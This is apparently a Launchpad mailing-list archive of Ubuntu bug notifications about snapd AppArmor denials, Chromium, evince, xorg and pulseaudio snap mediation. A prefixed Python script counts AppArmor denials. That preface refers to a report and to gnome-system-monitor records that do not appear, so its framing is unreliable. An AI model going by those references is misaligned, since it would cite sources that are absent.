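One way to triage a denial flood like the one counted with `journalctl | grep | wc -l` in the report above, as an added example that is not part of the report or of snapd: it parses AppArmor `DENIED` records in the shapes quoted in these notifications (file, capability and D-Bus), folds `/proc/<pid>` paths into one bucket, and counts by profile, operation and target. The function names are this example's own, and the sample lines are constructed after the records quoted on this page.

```python
import re
from collections import Counter

# key="quoted value" or key=bare. Bare values may not contain quotes, so the
# msg='apparmor="DENIED" ...' wrapper of type=1107 records is not swallowed.
_PAIR = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s"\']+))')
_PROC_PID = re.compile(r"^/proc/\d+(?=/|$)")


def parse_denial(line):
    """Return profile/operation/target/mask/pid for a DENIED record, else None."""
    start = line.find('apparmor="DENIED"')
    if start == -1:
        return None
    # Parse only from apparmor= onward: in D-Bus records the pid= before it
    # belongs to dbus-daemon, not to the confined client.
    fields = {k: (q or b) for k, q, b in _PAIR.findall(line[start:])}
    # File and capability records carry profile=; D-Bus records carry label=.
    profile = fields.get("profile") or fields.get("label")
    if not profile:
        return None
    op = fields.get("operation", "?")
    if op == "capable":
        target = fields.get("capname", "?")
    elif op.startswith("dbus"):
        target = "{}:{}.{}".format(fields.get("name", "?"),
                                   fields.get("interface", "?"),
                                   fields.get("member", "?"))
    else:
        # Per-process paths differ only by PID; fold them into one bucket.
        target = _PROC_PID.sub("/proc/<pid>", fields.get("name", "?"))
    return {
        "profile": profile,
        "operation": op,
        "target": target,
        "mask": fields.get("denied_mask") or fields.get("mask"),
        "pid": fields.get("pid"),
    }


def summarize(lines):
    """Count denials per (profile, operation, target)."""
    counts = Counter()
    for line in lines:
        rec = parse_denial(line)
        if rec:
            counts[(rec["profile"], rec["operation"], rec["target"])] += 1
    return counts


def denial_share(lines, profile_prefix):
    """(denials for matching profiles, total lines): grep | wc -l vs wc -l."""
    lines = list(lines)
    hits = 0
    for line in lines:
        rec = parse_denial(line)
        if rec and rec["profile"].startswith(profile_prefix):
            hits += 1
    return hits, len(lines)


GSM = "snap.gnome-system-monitor.gnome-system-monitor"

# Constructed sample, modelled on the records quoted in these reports.
SAMPLE = [
    'Jun 23 19:04:24 host kernel: audit: type=1400 audit(1529751864.744:47): '
    'apparmor="DENIED" operation="capable" '
    'profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" '
    'capability=6 capname="setgid"',
    'audit[2095]: AVC apparmor="DENIED" operation="open" profile="' + GSM + '" '
    'name="/proc/2932/wchan" pid=2095 comm="gnome-system-mo" '
    'requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000',
    'audit[2095]: AVC apparmor="DENIED" operation="open" profile="' + GSM + '" '
    'name="/proc/3011/wchan" pid=2095 comm="gnome-system-mo" '
    'requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000',
    'audit[2095]: AVC apparmor="DENIED" operation="open" profile="' + GSM + '" '
    'name="/proc/1/cgroup" pid=2095 comm="gnome-system-mo" '
    'requested_mask="r" denied_mask="r" fsuid=1000 ouid=0',
    """audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 """
    """msg='apparmor="DENIED" operation="dbus_method_call" bus="system" """
    """path="/" interface="org.freedesktop.DBus.ObjectManager" """
    """member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 """
    """label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined"'""",
    'Jun 23 19:04:28 host pkexec[8128]: pam_unix(polkit-1:session): '
    'session opened for user root by (uid=1000)',
]

if __name__ == "__main__":
    for key, n in summarize(SAMPLE).most_common():
        print(n, *key)
    print(denial_share(SAMPLE, "snap.gnome-system-monitor."))
```

On a live system the same functions can be fed the lines of `journalctl -k` output instead of `SAMPLE`.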
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
I've added it to my trello card for 2.43 policy updates. ** Changed in: snapd (Ubuntu) Status: New => Triaged -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1851211 Title: [snap] SoloKeys not supported by u2f-devices interface Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: Triaged Bug description: This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164 it is still open. No chance to use such a key in the browser. dmesg output is: My dmesg output shows a lot of DENIED: audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
[ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Suggested solutions in the other tickets do not work System is Ubuntu 19.10 on an Asus UX330 --- ProblemType: Bug ApportVersion: 2.20.11-0ubuntu8.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME DRM.card0-HDMI-A-1: enabled: enabled dpms: On status: connected modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480 DRM.card0-eDP-1: enabled: disabled dpms: Off status: connected modes: 1920x1080 DiskUsage: Filesystem Type Size Used Avail Use% Mounted on /dev/sda6 ext4 184G 35G 140G 20% /home tmpfs tmpfs 7,8G 152M 7,7G 2% /dev/shm /dev/sda6
ext4 184G 35G 140G 20% /home DistroRelease: Ubuntu 19.10 InstallationDate: Installed on 2017-09-30 (766 days ago) InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0a2b Intel Corp. Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: ASUSTeK COMPUTER INC. UX330UAK Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1 PackageArchitecture: amd64 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=33f0c319-6f77-49d2-85ed-236d397fc004 ro quiet splash vt.handoff=7 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Snap.ChromeDriverVersion: ChromeDriver 78.0.3904.70 (edb9c9f3de0247fd912a77b7f6cae7447f6d3ad5-refs/branch-heads/3904@{#800}) Snap.ChromiumVersion: Chromium 78.0.3904.70 snap Tags: eoan snap Uname: Linux 5.3.0-19-generic x86_64 UpgradeStatus: Upgraded to eoan on 2019-10-23 (14 days ago) UserGroups: adm cdrom daemon dialout dip docker kvm lpadmin plugdev sambashare sudo www-data _MarkForUpload: True dmi.bios.date: 04/19/2019 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: UX330UAK.315
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
** Changed in: evince (Ubuntu) Status: Confirmed => Triaged ** Changed in: evince (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1794064 Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap Status in evince package in Ubuntu: Triaged Bug description: This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap). This is not a recent regression, it's not working on bionic either. ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.0-2 ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5 Uname: Linux 4.18.0-7-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.10-0ubuntu11 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Mon Sep 24 12:28:06 2018 EcryptfsInUse: Yes InstallationDate: Installed on 2016-07-02 (813 days ago) InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1) SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago) modified.conffile..etc.apparmor.d.abstractions.evince: [modified] mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1794064/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1849947] [NEW] Dell XPS 13 (7390) Display Flickering - 19.10
Public bug reported: Hi there, I recently purchased a Dell XPS 13 7390 (Developer Edition). I decided to replace 18.4 LTS with 19.10 and so far it has been pretty smooth. However, there is one issue which occurs frequently whereby the display flickers and becomes unusable. The best way to describe the appearance is that the image becomes heavily distorted. Sometimes it only happens for a split second, other times it is permanently distorted. When this happens, simply closing the laptop lip and re-opening seems to put the display back into it's correct state. I didn't experience this issue on 18.04 LTS which is why I believe it's a Software Bug within 19.10. ProblemType: Bug DistroRelease: Ubuntu 19.10 Package: xorg 1:7.7+19ubuntu12 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Uname: Linux 5.3.0-19-generic x86_64 ApportVersion: 2.20.11-0ubuntu8 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Sat Oct 26 11:11:43 2019 DistUpgraded: Fresh install DistroCodename: eoan DistroVariant: ubuntu ExtraDebuggingInterest: Yes, if not too technical GraphicsCard: Intel Corporation Device [8086:9b41] (rev 02) (prog-if 00 [VGA controller]) Subsystem: Dell Device [1028:0962] InstallationDate: Installed on 2019-10-25 (0 days ago) InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017) MachineType: Dell Inc. XPS 13 7390 ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.3.0-19-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 08/23/2019 dmi.bios.vendor: Dell Inc. dmi.bios.version: 1.1.3 dmi.board.name: 0G2D0W dmi.board.vendor: Dell Inc. dmi.board.version: A00 dmi.chassis.type: 10 dmi.chassis.vendor: Dell Inc. 
dmi.modalias: dmi:bvnDellInc.:bvr1.1.3:bd08/23/2019:svnDellInc.:pnXPS137390:pvr:rvnDellInc.:rn0G2D0W:rvrA00:cvnDellInc.:ct10:cvr: dmi.product.family: XPS dmi.product.name: XPS 13 7390 dmi.product.sku: 0962 dmi.sys.vendor: Dell Inc. version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.99-1ubuntu1 version.libgl1-mesa-dri: libgl1-mesa-dri 19.2.1-1ubuntu1 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.xserver-xorg-core: xserver-xorg-core 2:1.20.5+git20191008-0ubuntu1 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.0.1-1ubuntu1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20190815-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.16-1 ** Affects: xorg (Ubuntu) Importance: Undecided Status: New ** Tags: amd64 apport-bug eoan ubuntu -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1849947 Title: Dell XPS 13 (7390) Display Flickering - 19.10 Status in xorg package in Ubuntu: New Bug description: Hi there, I recently purchased a Dell XPS 13 7390 (Developer Edition). I decided to replace 18.4 LTS with 19.10 and so far it has been pretty smooth. However, there is one issue which occurs frequently whereby the display flickers and becomes unusable. The best way to describe the appearance is that the image becomes heavily distorted. Sometimes it only happens for a split second, other times it is permanently distorted. When this happens, simply closing the laptop lip and re-opening seems to put the display back into it's correct state. I didn't experience this issue on 18.04 LTS which is why I believe it's a Software Bug within 19.10. 
ProblemType: Bug DistroRelease: Ubuntu 19.10 Package: xorg 1:7.7+19ubuntu12 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Uname: Linux 5.3.0-19-generic x86_64 ApportVersion: 2.20.11-0ubuntu8 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Sat Oct 26 11:11:43 2019 DistUpgraded: Fresh install DistroCodename: eoan DistroVariant: ubuntu ExtraDebuggingInterest: Yes, if not too technical GraphicsCard: Intel Corporation Device [8086:9b41] (rev 02) (prog-if 00 [VGA controller]) Subsystem: Dell Device [1028:0962] InstallationDate: Installed on 2019-10-25 (0 days ago) InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017) MachineType: Dell Inc. XPS 13 7390 ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.3.0-19-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 08/23/2019 dmi.bios.vendor: Dell Inc. dmi.bios.version: 1.1.3 dmi.board.name: 0G2D0W dmi.board.vendor: Dell Inc. dmi.board.version: A00 dmi.chassis.type: 10 dmi.chassis.vendor: Dell Inc. dmi.modalias:
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Ok, I'll fix this in the next batch of policy updates for snapd. ** Changed in: snapd (Ubuntu) Importance: Undecided => Low ** Changed in: snapd (Ubuntu) Status: New => Triaged ** Changed in: snapd (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: Triaged Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Ok, that is a read on /home/ubuntu/.Private/. Is the encrypted home mounted at the time of the denial? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: New Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Encrypted home is typically setup as ~/.Private, not ~/Private and the policy already allows: owner @{HOME}/.Private/** mrixwlk, owner @{HOMEDIRS}/.ecryptfs/*/.Private/** mrixwlk, The home interface should already allow ~/Private. What is the denial you see in the logs? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: New Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Changed in: pulseaudio (Ubuntu Xenial) Status: In Progress => Triaged ** Changed in: pulseaudio (Ubuntu Bionic) Status: In Progress => Triaged -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Triaged Status in pulseaudio source package in Bionic: Triaged Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).
The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio 
test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] - Since the pulseaudio mediation behavior triggers when the security label - starts with 'snap.' 
it is su + IMPORTANT: if updating pulseaudio while the session is running, either + need to reboot for the test or kill pulseaudio so it can restart with + the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... 
^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' 
it is su For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes - For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... 
yes - For strict snaps with audio-playback/audio-record: + $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
